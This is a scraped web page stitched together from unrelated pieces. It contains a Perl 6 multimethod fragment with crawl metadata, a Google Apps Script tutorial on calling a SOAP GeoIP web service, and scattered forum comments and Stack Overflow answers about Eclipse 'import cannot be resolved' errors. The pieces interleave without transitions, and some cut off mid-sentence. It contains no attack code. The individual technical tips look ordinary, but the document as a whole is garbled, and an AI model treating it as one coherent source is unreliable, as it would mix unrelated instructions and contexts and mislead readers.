handle_event ($window, $event: $mode) {...} # two invocants Multimethod invocant arguments are passed positionally, though the first invocant can be passed via the method call syntax: #. The first invocant is always the topic of the corresponding method or multimethod.
http://www.perl.com/pub/a/2003/04/09/synopsis.html
crawl-002
refinedweb
727
55.74
Trace function over GF(q) Hi, I understand the idea of defining functions over GF(q) which You explained me very precisely. Now I have following problem: I want to define the function: f(x,y)=Tr(x*g(y/x)), where Tr(x)=x+x^2+x^4 ( Tr:GF(8)-->GF(2)) and x*g(y/x)=[(y*[d^2*[(y/x)^3+1]+d^2*(1+d+d^2)*[(y/x)^2+(y/x)]])/((y/x)^4+d^2*(y/x)^2+1)]+(y/x)^(1/2). Let (for example) d=3. With convention that 1/0=0 (y/0=0), I want to see what values this function f receives. How can I do this in SAGE? What I did (with Yours help): def custom_divide(x,y): if y==0: return 0 return x/y F.<a>=GF(8) for a,b in F^2: print "x: ",a,"y: ",b,"x/y: ",custom_divide(a,b) F.<a>=GF(8) for a,b in F^2: print "x*y: ",a*b,"(x*y)^2: ",(a*b)^2,"(x*y)^(1/2): ",(a*b).nth_root(2) I'm stopped here because I'm not sure how can I define such function f. Any help/advices will be highly appreciated. I could write more details if something is not clear. Best regards, Arczi
https://ask.sagemath.org/question/8891/trace-function-over-gfq/?sort=latest
CC-MAIN-2020-45
refinedweb
224
77.43
CRM 4.0 How to handle when user click "Track in CRM" on an email that doesn't exist on a contact - Tuesday, December 09, 2008 9:54 AM I have been asked to write some code to handle the following problem: If a user in Outlook clicks "Track in CRM" on a mail with an email address that does not exist in CRM on any contact the email is put in the database with no relationship to any record so it is kind of "Lost". So instead they (the CRM guys) want me to write some code that when a user clicks "Track in CRM" the code searches on all contacts to see if that email exists and if not I should give a warning that this contact email does not exist and a question if they would like to create the contact. If they click yes to create contact I should bring up the "New contact" window in CRM. And when the contacts is created then the Tracking can be applied. I have never programmed towards CRM before so please treat me as a novice in CRM. I am greatful for all help I can get. What I know so far is that the event that fires when user clicks "Track in CRM" is called CreateNewEmail activity. However I do not know if this should be solved by writing a Workflow or if it is a JScript solution. All Replies - Tuesday, December 09, 2008 1:54 PMYou can not do this in JavaScript because the button is an "MS CRM Outlook Client Add-On".You can not do it in Workflow because workflows get executed serverside and do not have a user interface element.If you really want to implement this functionality you will need to write an Outlook "Add-On" in c#.The new email activity is created when the email is sent so it is not really useful in your case as you want your function to search the MS CRM database and provide user with custom optoin to create new if it does not exist.Simple Solution:Why dont you ask users to type the name of the person they want to send the email to in the "To" field and then click "Check Names" function of outlook. If nothing is returned then they can go in and create the contact.You can read more about this at the URL below:Hassan. - Tuesday, December 09, 2008 2:36 PM Thanks for the reply. That saves my a lot of trouble of trying and failing. However your solution does not solve the problem. The problem is that the users say get an email from someone and then they decide that they want this email tracked in CRM. So they click the track in CRM button. But if for some reason this persons email was not already in CRM as one of the contacts emails then the tracking just lays "hidden" in the database with a no connection to any contact. Hence you cannot find it later in CRM (withouth going into the databasetable). yet for the user it looks like it is being tracked as the icon changes on the email in the Outlook client. For the users this seems like a big bug as it does not ive a warning saying you cannot track this in CRM as this contact does not exist. So this is not nessecary when sending an email, it most often is when received an email. Any other ideas to how I can solve this? Lisa-Marie - Tuesday, December 09, 2008 2:44 PMYes.All emails not associated with any contact are visible in MS CRM with a RED Exclamation mark. You do not need to look in the database for those emails.To view such emails go to My Workplace -> Activities -> Filter by Email ->Recieved Emails.You will see emails that were tracked by MS CRM becasue the user clicked on the "Track in MS CRM" button but MS CRM could not find a contact to associate the email with.When you click on the Red Exclamation mark the system will let you assocaited the email with an existing contact OR let you create a new contact.Let your system know how to do this and make this a part of your SOP (Standard Operating Prcedure). This should solve your problem.Hassan. - Tuesday, December 09, 2008 10:05 PM Hi, Ok sounds reasonable. Thank you! Do you mean System Administrator and that person should be responsible to resolve missing contacts as a SOP? Also.. did you possibly mean a RED Questionmark? As that seem to be the only thing I see when I follow your instrucitons. And also I do not have a filter for received emails.... just My received emails so I guess Administrator need to use the filter All Emails and go through all of those with a RED Questionmark and resolve the missing contact?? Lisa-Marie - Wednesday, December 10, 2008 12:03 PM Hi again. I presented your solution to the system administrator who is also a user of CRM, and she was not pleased with this solution. She thinks it is not very user friendly. Also she will not always know the contact details for contacts, and therefore can't create the missing contacts. And if she is the one creating the contact then she is the owner of the contact and that, according to her, is not correct. We discussed some options and found another approach to do this problem. This is the solutions: "Create a workflow that starts when a new email is tracked in CRM. This workflow need to check if there are any conflicts with the TO and FROM contacts in the email and if there is it should send an email to the creator of the tracking that there is an unresolved contact in this email tracking, and include a link that will open up the tracked email in CRM and let the user fix it themselves from there." So question now is... how can I implement this Workflow. Keep in mind I am still a novice in CRM. However I have programmed workflows in SharePoint before so I assume there are some simularities. All help is appriciated! Lisa-Marie - Wednesday, December 10, 2008 3:22 PMHi Lisa,If you want to do this using workflow you will need to create a workflow assembly.Download the SDK. You will find sample code to do what you are trying to do.You can download the SDK from the URL below:. - Wednesday, December 10, 2008 3:51 PM Great thanks. I was trying to create a simple workflow in the GUI, but I don't think I have the tools to check if the email has a "recipient not resolved to a record" error on it and there for I cannot do this. I will take use of the SDK and see if I can find more there. I need help to find the property names for the error mesage "At least one recipient could not be resolved to a record in the system". And also what is the property name to get the direct link to open the spesific email in CRM. I want to create a task on the user that started the Tracking of the email that he must add a contact, and in the task have the link directly to the email. Regards, Lisa-Marie - Wednesday, December 10, 2008 4:12 PMLisaAll records in MS CRM have a GUID.You need to create a workflow that runs when an email activity is created. You need to pass the GUID of the new email to your custom code.You could will then check if it is an incomig email or outgoing email.If incoming you will need to use "CheckIncomingEmailResponse.ReasonCode". Check SDK for details.Hassan. - Thursday, December 11, 2008 11:00 AM Hassan, What do I do with the GUID? Do I need to use the CrmService to get the Email based on the GUID? How do I check if the email in incomming or outgoing? So if I have understood you correctly I should create a custom activity that checks an email if it has a ReasonCode equeal to Unresolved contact. And have the activity return true or false. Then I Create a Workflow in CRM and make use of this custom activity. The rest of the workflow steps I can create through teh CRM GUI? Thanks for all help. Lisa-Marie - Thursday, December 11, 2008 11:18 AMHi Lisa,>>Do I need to use the CrmService to get the Email based on the GUID?Yes.>>How do I check if the email in incomming or outgoing?You use the "directioncode" attribute of the email entity.>>So if I have understood you correctly I should create a custom activity that checks an email if it has a ReasonCode equeal to Unresolved contact. And have the activity return true or false.NO. You dont need to create any custom entities. the Email Entity you retreive by using the GUID will give you the ReasonCode you will need to use.>>Then I Create a Workflow in CRM and make use of this custom activity. The rest of the workflow steps I can create through teh CRM GUI?No. You create a workflow to capture the "New Email activity created" event. Your workflow fires off when a new email activity is created in the system. Your workflow will pass the GUID of the new email to your assembly.Hassan. - Thursday, December 11, 2008 12:00 PM Hassan, What I tried to say is that I need to create a Custom Workflow Activity that I can use in a CRM workflow? And that I don't have to write the entire workflow in code but can create most of the workflow in CRM and in that make use of the custome workflow activity that I have created in code. I looked at the ReasonCode but I don't understand how I can use that to tell if contacts in TO or FROM field is missing a record in CRM. Also I do not really care if the email in incomming or outgoing as I need to check both types of emails. In the TO/ FROM field of an email there could be more than 1 contact and also there could be 1 of 5 contacts that is missing a record whilst the other 4 is fine. I found this code; and have made use of a lot from here. I believe I am on the right way finally. - Thursday, December 18, 2008 8:58 AM Hi Hassan, Did you or anyone else have an answer to my last post? Regards, Lisa-Marie - Thursday, December 18, 2008 1:53 PMHi Lisa,No replies yet. How are you getting on? Found a solution yet?Hassan. - Thursday, January 08, 2009 2:12 PM It has been on hold over Christmas so I needed to get back into it again. No unfortunatly I have not found a solution. So far this is the code I have written for the custom activity:Code Snippet namespaceCreateResolveContactProblemTask { [ [CrmWorkflowActivity("Check For Unresolved Contacts", "Custom Activities Library")] public sealed partial class CheckForUnresolvedContacts : SequentialWorkflowActivity { [CrmInput("Current EmailID")] [CrmReferenceTarget("email")] public Lookup CurrentEmailId { } #regionDependency Properties /// <summary> /// Using a DependencyProperty as the backing store for EmailGuid. This enables animation, styling, binding, etc... /// </summary> public static readonly DependencyProperty CurrentEmailIdProperty = DependencyProperty.Register("CurrentEmailId", typeof(Lookup), typeof(CheckForUnresolvedContacts)); /// <summary>/// Returns true or false if this email had a unresolved contact /// </summary> [CrmOutput("Has Unresolved Contacts")] public bool HasUnresolvedContacts { } #endregion { InitializeComponent(); } { //Use the context service to create an instance of CrmServiceICrmService crmService = context.CreateCrmService(); Guid newEmailId = CurrentEmailId.Value; try { if (crmEmail != null) { // Directioncode = true if email is outgoingif (crmEmail.directioncode.Value) { } } } catch (System.Web.Services.Protocols.SoapException se) { TextWriter w = new StreamWriter(@"C:\Downloads\SeCrmerror.txt"); w.WriteLine(se.Message + " " + se.InnerException.Message); w.Close(); return ActivityExecutionStatus.Faulting; } catch (Exception ex) { TextWriter w = new StreamWriter(@"C:\Downloads\ExCrmerror.txt"); w.WriteLine(ex.Message + " " + ex.InnerException.Message); w.Close(); return ActivityExecutionStatus.Faulting; } return base.Execute(executionContext); } } } I need to figure out how to debug so that I can find the answer to how to check for the error. - Monday, January 26, 2009 10:06 PM Debugging a Plug-in The following steps describe how to debug a plug-in. - Deploy the plug-in assembly. Copy the assembly to the standard plug-in folder on the server: <crm-root>\Server\bin\assembly. If there is another copy of the assembly at the same location and you cannot overwrite that copy because it is locked by Microsoft Dynamics CRM, run the iisreset program in a command window to free the assembly. - <crm-root>\Server\bin\assembly folder and IIS must then be restarted. After debugging has been completed, you must remove the .pdb file and reset IIS to prevent the w3wp.exe process from consuming additional memory. you may not know which process to attach to. You can do an IIS reset to terminate those processes. Next, open or refresh the Microsoft Dynamics CRM Web application to start the process. - Register the plug-in in the database. After the edit/compile/deploy/test/debug cycle for your plug-in has been completed, unregister the (on-disk) plug-in assembly and then reregister the plug-in in the Microsoft Dynamics CRM database. - Wednesday, July 21, 2010 9:30 AM
http://social.microsoft.com/forums/en-US/crmdevelopment/thread/74702ed5-bf96-413b-bed9-df727407553f/
CC-MAIN-2013-20
refinedweb
2,247
71.85
The MERN stack consists of MongoDB, Express, React / Redux, and Node.js. Given the popularity of React on the frontend and of Node.js on the backend, the MERN stack is one of the most popular stack of technologies for building a modern single-page app. Here’s a breakdown of the typical stack setup: MongoDB as a NoSQL database - An open source document database that provides persistence for application data. - Bridges the gap between key-value stores (fast and scalable) and relational databases (rich functionality). - Stores data as JSON documents in collections with dynamic schemas. - Designed with scalability and developer agility in mind. - Designed to be used asynchronously thus it pairs well with Node.js applications. Express web framework of Node.js provides routing and middleware - Basically runs the backend code as a module within the Node.js environment. - Handles the routing of requests to the right parts of your app. React.js provides a dynamic frontend - A JavaScript library developed by Facebook to build interactive / reactive interfaces. Node.js on the server - A javascript runtime environment. - An asynchronous event-driven engine - which means the app makes a request for some data and then performs other tasks while waiting for a response. The MERN stack wasn’t always the frontrunner in the JavaScript web app game. Many companies and developers still use the MEAN stack, which is identical to the MERN stack except it uses AngularJS or Angular instead of React for the frontend. One of the distinguishing features from React is the virtual DOM manipulation, which helps keep apps dynamic and fast. Before Getting Started There are plenty of starter-kits out there for people who just want to get a CRUD full-stack app up and running. These tools won’t give you everything you need for a MERN app but they will give you a head start. - Create React App provides a simple npm package to create a React App with no build configuration. - mern.io provides a boilerplate project and a command line interface utility. In this post we’ll setup everything from scratch however, to give you a better idea of how the pieces fit together. Getting Started - Create a directory on your computer called mern-starter (or whatever you like). cdinto that directory. - Create a backend and a frontend repo on github or using the command line. - Clone both repos into the mern-stack directory. cdinto the backend repo and run npm init -y. - Next, run touch index.js README.md .eslintrc.json .eslintignore .gitignore .env. - Then, run npm i -S express http-errors mongoose superagent body-parser cors dotenv. - Finally, run npm i -D jest eslint. With that, we’ve got our basic scaffolding setup for the backend. Go ahead and configure your .eslintrc.json, .eslintignore, .gitignore and .env. Your .env file should contain your environment variables: .env PORT=3000 DEBUG=true API_URL= CORS_ORIGINS= APP_SECRET='something secret' MONGODB_URI=mongodb://localhost/mern-starter Your package.json should have all of the installed dependencies as well as these scripts: package.json "scripts": { "lint": "eslint ./", "test": "jest -i --verbose --coverage --runInBand", "start": "node index.js", "dboff": "killall mongod", "watch": "nodemon index.js", "dbon": "mkdir -p ./db && mongod --dbpath ./db" }, Next, we’re going to set up our server: - Navigate into your editor and open your project. - From the root of your backend repo create a srcfolder. - Inside of the src folder create a main.jsfile, a libfolder, a middlewarefolder, a modelfolder, and a routefolder. Navigate into the lib folder and create a server.js file - this is where we are going to set up our server and connect it to MongoDB: server.js 'use strict' import cors from 'cors'; import express from 'express'; import mongoose from 'mongoose'; import bodyParser from 'body-parser'; const app = express(); const router = express.Router(); // env variables const PORT = process.env.PORT || 3000; const MONGODB_URI = process.env.MONGODB_URI || 'mongodb://localhost/mern-starter'; mongoose.Promise = Promise; mongoose.connect(MONGODB_URI); app.use(bodyParser.json(),cors()) app.use(require('../route/auth-router')); app.all('*', (request, response) => { console.log('Returning a 404 from the catch-all route'); return response.sendStatus(404); }); // error middleware app.use(require('./error-middleware')); export const start = () => { app.listen(PORT, () =>{ console.log(`Listening on port: ${PORT}`) }) } export const stop = () => { app.close(PORT, () => { console.log(`Shut down on port: ${PORT}`) }) } This is a very basic server setup. At the top of our file we are importing our npm packages. We are setting up our express router and connecting to mongoose, then requiring-in our routes and middleware. We then export the start and stop variables that turn our server off and on and log what PORT we are on. The next thing we need is to go into our index.js file at the root of our backend repo and require('./src/lib/server').start(). This is requiring-in our server file and starting the server. Schema and Models Keep in mind you should create at least one model and one route before trying to start the server. Below you’ll find a sample mongoose Schema (mongoose is mongoDB object modeling for node) and a sample route. We’ll create a user Schema, aka a user model. Everything in Mongoose starts with a Schema. Each schema maps to a MongoDB collection and defines the shape of the documents within that collection. Here we are declaring all of the properties we can expect users to have attached to their model, what data type they are, if they are unique or not, and if we want them to be required or not. In this same file we can create methods like User.create() which is how we create new users. models/user.js const userSchema = mongoose.Schema({ passwordHash: { type: String, required: true }, email: { type: String, required: true, unique: true }, username: { type: String, required: true, unique: true }, tokenSeed: { type: String, required: true, unique: true }, created: { type: Date, default : () => new Date()}, }); const User = module.exports = mongoose.model('user', userSchema) And then in the following snippet are auth routes - we’re using express’s Router to create routes and endpoints allowing a user to signup or login to our app: routes/user.routes.js 'use strict' import { Router } from 'express'; import bodyParser from 'body-parser'; import basicAuth from '../lib/basic-auth-middleware.js' import User from '../model/user.js'; const authRouter = module.exports = new Router(); authRouter.post('/api/signup', jsonParser, (req, res, next) => { console.log('hit /api/signup') User.create(req.body) .then(token => res.send(token)) .catch(next) }) authRouter.get('/api/login', basicAuth, (req, res, next) => { console.log('hit /api/login') req.user.tokenCreate() .then(token => res.send(token)) .catch(next) }) Now we should be able to go to our terminal, make sure we cd into the backend repo, and run the command npm run dbon, this should start mongodb. Then open a new backend terminal tab and run the command npm run start. And that’s it for a bare minimum backend setup! Let’s now set up a very basic frontend with React. Frontend Setup cdinto the frontend directory and run npm init -yto create a package.json file. - Next, run touch README.md .eslintrc.json .eslintignore .gitignore .env .babelrc webpack.config.js. - Then, run npm i -S babel-core babel-loader babel-plugin-transform-object-rest-spread babel-preset-env babel-preset-react css-loader extract-text-webpack-plugin html-webpack-plugin node-sass react react-dom resolve-url-loader sass-loader webpack webpack-dev-server babel-cli. - Be aware that extract-text-webpack-pluginis now deprecated in webpack 4.0.0. - Then run npm i -D jest eslint. Open your code editor and add these scripts to your package.json: package.json "scripts": { "lint": "eslint . ", "build": "webpack", "watch": "webpack-dev-server --inline --hot" }, We're using the --hot flag to enable webpack's Hot Module Replacement. Create a src folder at the root of. Inside of src create a main.js file that has: main.js import React from 'react'; import ReactDom from 'react-dom'; import App from './components/app'; const container = document.createElement('div'); document.body.appendChild(container); ReactDom.render(<App />, container); Inside of src create a components folder and inside of the component folder create a folder named app. Inside of the app folder create an index.js that has the following code: components/app/index.js import React from 'react'; class App extends React.Component { constructor(props){ super(props); } render() { return ( <div> <h1>MERRRRRN</h1> </div> ); } } export default App; Plus, let’s add a webpack confiration file: webpack.config.js 'use strict' const ExtractPlugin = require('extract-text-webpack-plugin') const HTMLPlugin = require('html-webpack-plugin') module.exports = { devtool: 'eval', entry: `${__dirname}/src/main.js`, output: { filename: 'bundle-[hash].js', path: `${__dirname}/build`, publicPath: '/', }, plugins: [ new HTMLPlugin(), new ExtractPlugin('bundle-[hash].css'), ], module: { rules: [ { test: /\.js$/, exclude: /node_module/, loader: 'babel-loader', }, { test: /\.scss$/, loader: ExtractPlugin.extract(['css-loader', 'sass-loader']), }, ], }, } We're using the Sass loader, so your project can make use of Sass files for styling. Here’s also our Babel configuration file: .babelrc { "presets": ["env", "react"], "plugins": ["transform-object-rest-spread"] } - The Babel envpreset automatically determines the Babel plugins you need based on your supported environments. - The Babel reactpreset converts JSX syntax and strips out type annotations. - The Babel plugin transform-object-rest-spreadtransforms rest properties for object destructuring assignment and spread properties for object literals. Now - in the frontend repo terminal window run the command npm run watch and navigate to the localhost url in the browser. Everything should now be working! 😅 Connecting the Frontend to the Backend Here’s an example of a request made inside of a handleSubmit(e) method, inside of a handleSubmit(e) { e.preventDefault(); return superagent.get(`${__API_URL__}/api/flights/${ this.state.from }/${ this.state.to }`) .then(res => { this.setState({ flights: [...res.body], hasSearched: true, }); }).catch(err => { this.setState({ hasError: true, }); }); } In this example, when handleSubmit is invoked by the user on the frontend, we use superagent to make a GET request to fetch our data from the backend, and we set hasSearched to true on the state of our component. And that, y'all, is a full-stack MERN app. 🎉
https://alligator.io/react/mern-stack-intro/
CC-MAIN-2020-34
refinedweb
1,689
51.14
Dec 2009 Goal This tutorial guides you through the steps of invoking a Soap service operation. Time to Complete Approximately 20 minutes Index This tutorial is divided into the following sections: - Section 1: Creating a Wsdl Object - Section 2: Querying a Wsdl Object - Section 3: Getting a WsdlService Object - Section 4: Querying a WsdlService Object - Section 5: Creating Web Service Paramaters - Section 6: Testing a Soap Operation - Section 7: Invoking a Soap Operation - Section 8: Working with a Soap Operation Result - Summary and Complete Code Section 1: Creating a Wsdl Object To help demonstrate this, we will use a simple and free SOAP web service provided by WebserviceX called GeoIPService. This web service allows you to easily look up the country of origin for a given IP Address. To use the SOAP library, the first thing you need is the WSDL file associated with the web service. WSDL (which stands for 'Web Service Definition Language') files contain the necessary metadata to let the library know where the service can be reached and which operations can be used. For this service, the WSDL can be found at "". Feel free to take a look. It's just a small XML file that describes what services and operations are available, and what types of arguments they expect to be given. Once you have the location of the WSDL file, you can start using it in Google Apps Script like so: var wsdl = SoapService.wsdl(""); Section 2: Querying a Wsdl Object SoapService.wsdl will return an object of type Wsdl that has several helpful methods on it to help you introspect the WSDL description at the specified location. For now, we'll use the method getServiceNames to determine what services are available. Normally, there will just be a single service available, but sometimes there might be more. You can invoke this method and log the results like so: Logger.log(wsdl.getServiceNames()); Running this and checking the log, you will see that one service was returned: 'GeoIPService'. (If you look at the original WSDL file, you'll see that this was the one service defined in it like so: <wsdl:service Section 3: Getting a WsdlService Object Now, we can start checking out that service to see what operations it makes available. There are two methods to get to the actual service. The first is to simply call getService on the Wsdl object with the name of the service returned above. i.e.: var geoService = wsdl.getService("GeoIPService"); The second is to get it like so: var geoService = wsdl.getGeoIPService(); How is it that this object has a method on it that's so specific to this particular web service? Thanks to the power of javascript's dynamic type system, the soap library is able to generate these convenience methods for you so your code can be far more direct about what it's trying to do without having to pass strings around all the time. So why would you ever use the first form? Sometimes SOAP services will have names for things that can't be represented in Javascript. For these situations, the first form provides a system that will always work no matter what the service name is. Section 4: Querying a WsdlService Object Now that you have the Service object, it's time to figure out what you can do with it. For that, you use the helpful getOperationNames method. As before, here's how you can invoke that method and log the result to take a look at: Logger.log(geoService.getOperationNames()); This will return the following result: [GetGeoIP, GetGeoIPContext] . As expected, these are the same names of the operations listed on the original WebservicesX page. For this example, you're going to want to invoke the Section 5: Creating Web Service Paramaters Now that you've found the operations we want, it's time to invoke your first web service. For this step it can be helpful to see how the web service is invoked currently. To determine this, you can either use one of the many Soap tools out there. Or, conveniently, WebserviceX has has pages that demonstrate their web services in action. You can try this out not by going from the original WebservicesX page to the specific operation page for GetGeoIP. On this page you can experiment by plugging in your own IP address, or just a sample IP address like "72.14.228.129". On the WebserviceX demonstration page you can see documentation showing that the web service is invoked with a message like so: POST /geoipservice.asmx HTTP/1.1 Host: Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: "" <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns: <soap:Body> <GetGeoIP xmlns=""> <IPAddress>72.14.228.129</IPAddress> </GetGeoIP> </soap:Body> </soap:Envelope> This would normally be a lot of infrastructure for you to handle. However, the Soap library will take care of most of this for you! All you need to provide is the following section from inside the <soap:Body> tag, and the library will take care of the rest: <GetGeoIP xmlns=""> <IPAddress>72.14.228.129</IPAddress> </GetGeoIP> To generate this snippet of Xml several helper methods are provided. For the above, you would use the following code: var param = Xml.element("GetGeoIP", [ Xml.attribute("xmlns", ""), Xml.element("IPAddress", [ "72.14.228.129" ]) ]); For full details on creating XML, please see the Xml Documentation. Section 6: Testing a Soap Operation Once you've created the parameter to pass to the web service, you can verify that the right message is being created by using the debugging method 'getSoapEnvelope' on the service object. This method does every step of the soap operation except for actually sending the message to the service on the Internet. This lets you see what is being generated in case you need to tweak or debug things. You can try it and check the results like so: var envelope = geoService.getSoapEnvelope("GetGeoIP", param) Logger.log(envelope); In the logs you should now see: <?xml version="1.0" encoding="UTF-8" standalone="no"?> <SOAP-ENV:Envelope xmlns: <SOAP-ENV:Body> <GetGeoIP xmlns=""> <IPAddress>72.14.228.129</IPAddress> </GetGeoIP> </SOAP-ENV:Body> </SOAP-ENV:Envelope> This is exactly the same as the XML shown above (except for some minor changes in how namespaces are named). With this, you can see that the message looks right and it's finally time to invoke the web service. Section 7: Invoking a Soap Operation To invoke the web service, two methods are provided. You can either call: var result = geoService.invokeOperation("GetGeoIP", [param]); or var result = geoService.GetGeoIP(param); As before (with getService ), we have automatically generated the method name from information in the WSDL file to make it easy for you to invoke. The latter form makes the code simple simpler and allows you to invoke the service with a minimum of fuss. However, if the operation name cannot be expressed in javascript, the former form is provided so that you can always invoke it. Section 8: Working with a Soap Operation Result Now that you've invoked the SOAP operation, it's time to work with the result provided. Because SOAP is a system for passing XML messages back and forth, the result returned is itself XML. To view the XML, you can call the help debugging method 'toXmlString' on it like so: Logger.log(result.toXmlString()); In the logs you'll now see: <?xml version="1.0" encoding="UTF-8" standalone="no"?> <GetGeoIPResponse xmlns=""> <GetGeoIPResult> <ReturnCode>1</ReturnCode> <IP>72.14.228.129</IP> <ReturnCodeDetails>Record Found</ReturnCodeDetails> <CountryName>UNITED STATES</CountryName> <CountryCode>US</CountryCode> </GetGeoIPResult> </GetGeoIPResponse> To get to the information we want (i.e. the country code for the IP address) you can now simply "dot" into the returned XML object in a very natural way like so: Logger.log(result.Envelope.Body.GetGeoIPResponse.GetGeoIPResult.CountryCode.Text); These helpful properties were generated for you by the Xml library. You can reach nested elements with their tag name, and you can get the text contents of an Xml element with the "Text" property. For full information on how to simply access information in an XML document, please see the Xml Documentation. Checking the logs you will now see "US" printed. Summary and Complete Code And now you've done it! You've been able to go from an arbitrary IP address to the country that it belongs to in just a few simple steps. Here's the code in its entirety: function determineCountryFromIP(ipAddress) { var wsdl = SoapService.wsdl(""); var geoService = wsdl.getGeoIPService(); var param = Xml.element("GetGeoIP", [ Xml.attribute("xmlns", ""), Xml.element("IPAddress", [ ipAddress ]) ]); var result = geoService.GetGeoIP(param); return result.Envelope.Body.GetGeoIPResponse.GetGeoIPResult.CountryCode.Text; } It's just that simple to now call into a soap service anywhere and process the result that you get back!
https://developers.google.com/apps-script/articles/soap_geoip_example
CC-MAIN-2015-27
refinedweb
1,484
54.73
I have read your project of 8051 based bluetooth control home automation.After understanding I implemented it but the bluetooth didn't give any response.Later I read your code and used the function Serialwrite(0x0d) and it worked.Without this statement the bluetooth is not responding.My question is transmitting 0x0d ,what does that signify? 4 posts / 0 new Doubt regarding usage of a certain function in 8051 based bluetooth home automation December 8, 2018 - 12:47pm Replies: 209 Yes aditya you have to write 0x0d everytime before you send a data. Accordig to ASCII table the value 0x0d represetns carriage return (Enter key). So the blutooth module should recevice a carriage return everytime before you send the data You voted ‘up’ Replies: 2 I have read about carriage return.It is simply putting cursor to first position.Could you explain why just putting a cursor in first position (carriage return) is very much important? You voted ‘up’ Replies: 209 You net to read the bluetooth datasheet if you wanna get more into it. During a communication data is always appended by /n/r where /n stands for new line this new line is given by the carriage return which is mandatory in our case. This is how the luetooth module will know that its the end of data and it should transmit what ever was received so far. Hope you get the point You voted ‘up’
https://circuitdigest.com/forums/embedded/doubt-regarding-usage-certain-function-8051-based-bluetooth-home-automation
CC-MAIN-2019-43
refinedweb
238
63.39
The code below is from the google website. QProgrammer says: July 7, 2015 at 3:34 pm Thank you for writing this article! share|improve this answer answered May 10 at 10:15 drJava 5911 add a comment| up vote 0 down vote I didn't understand the reasoning behind this but this solved the same problem Report a bug Atlassian News Atlassian Parse Server Open Source Docs Help Blog You're looking at our questions archive. get redirected here Classes compiling AFTER the malformed code reported the errors above even though their source code was, in fact, 100% correct! Try the below- GO to any red marked line > Press Ctrl + 1 > Fix project setup. Looked over the first 6 answers, and then looked at the BuildPath, Configure Build Path…, and there, much to my surprise, was my interface listed as EXCLUDED. Now I check your information and if something isn't clear, I ask again your help. I got to Starting Another Activity and then got an error when I added @SuppressLint("NewApi") to class DisplayMessageActivity. Gene says: March 23, 2010 at 7:06 pm Thanks to David Resnick for his comment. Sweta says: September 15, 2010 at 2:38 am Thanks! Maybe it's better to move and copy them in the OS environment! Clean the project or projects. it is fixed when i do a clean, and-build, refresh, but now for some reason it doesnt work anymore… any suggestions are most welcome.. Many thanks Sameer Faraz Hussain says: September 22, 2011 at 7:29 pm I had a similar problem; the difference was that I use ant in the command line to build, not Cannot Be Resolved To A Type Eclipse Anyway, adding the Atlassian SDK Maven did the solve thi issue. Squiggly red. Good times amir sepasi says: January 25, 2012 at 3:20 pm The way it worked for me was to include all .h files that the red underline refer to, compile it I sense you are trying to do too much too quickly, even your comment about "random" examples. I am doing Spring ! Without the changes, we could never get errors out. Eclipse Update Classpath How can I resolve this? //////////////////////////////////////////// package com.parse.starter; import com.parse.Parse; import com.parse.ParseACL; import com.parse.ParseUser; import android.app.Application; public class ParseApplication extends Application { @Override public void onCreate() { super.onCreate(); // Add your We have a project with a signifanct number of classes (over 1000). share|improve this answer answered Oct 19 at 8:47 Stoyan Chervenkov 1 add a comment| up vote -2 down vote For me, Project ---> Source ---> Format solved the problem share|improve this Make sure Build automatically is checked and Clean. For instance com.opensimphony.user.User was replaced for com.atlassian.crowd.embedded.api.User on JIRA 5, I'm pretty sure that is the case for the other classes to. The Import Cannot Be Resolved In Jsp allanmc says: January 21, 2015 at 2:30 am Thanks pdu, your solution saved my day Guru says: February 4, 2015 at 8:13 pm Thank you…..it worked great….. The Import Net Cannot Be Resolved Eclipse Hope this helps. Comment 2 Gilles WIART 2006-07-05 04:27:34 EDT This is the same for me. Thank you! Not saying it's bug free, but nothing is, and I've never seen errors like this there. And thank you David Resnick for the great tip! Eclipse Clean All Projects Can I use that to take out what he owes me? Can't I just import all the Jars into the project instead ? You helped me save some time! useful reference Everything: cannot resolve class. 10 minutes into playing with Eclipse and I am searching for obscure error. I was doing a little cleanup and I created a temp directory at the top of my project folder so I could move some files there. The Import Org Hibernate Cannot Be Resolved Maven Note: I imported the code repository from bibucket via the mercurial plugin itself. Once again, thanks. share|improve this answer edited Aug 11 '15 at 15:32 answered Feb 3 '14 at 12:53 m0skit0 15.1k54377 it will be helpful for newbies...... –sunleo Feb 3 '14 at 13:05 Why is the reduction of sugars more efficient in basic solutions than in acidic ones? Why did Michael Corleone not forgive his brother Fredo? The Import Org.hibernate Cannot Be Resolved In Eclipse share|improve this answer edited Mar 11 '14 at 13:15 bluish 9,5561271126 answered Mar 11 '14 at 9:35 Ravikumar 1 This does not provide an answer to the question. To critique or request clarification from an author, leave a comment below their post - you can always comment on your own posts, and once you have sufficient reputation you will I agree it is a bug and a very annoying one. Murukesan says: April 3, 2012 at 8:48 am I faced the same problem even though i followed above tips .Then i did validate the project once again it resolved.Thanks for the dhivya says: February 6, 2014 at 12:19 am thank you!it resolves the error Chris says: February 25, 2014 at 9:16 am THANK YOU!! I am fearful that we might add some code that leads to a situation where we can't figure out a way to restructure things so we can get it to compile. I usually run the project on the server from eclipse. Disable "Build Automatically" and press File>Refresh (F5). The rebuild stuff is just 2nd nature to Java programmers so that had all been done. asked 3 years ago viewed 127667 times active 4 months ago Upcoming Events 2016 Community Moderator Election ends Nov 22 Get the weekly newsletter! Thank you. Join them; it only takes a minute: Sign up Eclipse error: “The import XXX cannot be resolved” up vote 68 down vote favorite 16 I'm trying to work with Hibernate in ng_agi says: March 26, 2009 at 1:47 am hi, unfortunatelly, ur solution didnt help me. Product catalog What would be the consequences of a world that has only one dominant species of non-oceanic animal life? niall says: April 28, 2010 at 9:56 am Yup, Project -> Clean did it for me, just as well too as the laptop was heading for the window. Simplest way is to open the .classpath file. - Since classes like HttpTransport and Credentials are not identified. The usage of "le pays de..." In Doctor Strange what was the title of the book Stan Lee was reading in his cameo? It is bad bug. David Resnick (comment below) discovered this tip for those with an external build script: Windows–>Preferences–>Java–>Compiler–>Building–>Output folder–>”Rebuild class files modified by others”. Linked 68 Eclipse error: “The import XXX cannot be resolved” 20 Import *** cannot be resolved 0 How to import lib to android eclipse Related 824R cannot be resolved - Android It seems an odd error! –bluish Dec 1 '10 at 9:41 1 do you have anything in the Problems view? –Bozho Dec 1 '10 at 9:50 Only the Tryskell says: November 19, 2012 at 10:16 pm If you are on the same problem, I invite you to make as following : - Right-click on project > "Team" > "Refresh/Cleanup". Any suggestions would be helpful. –Oleg Kuts Aug 23 '15 at 22:20 This helped, along with deleted a specific repo that was giving me problem in my 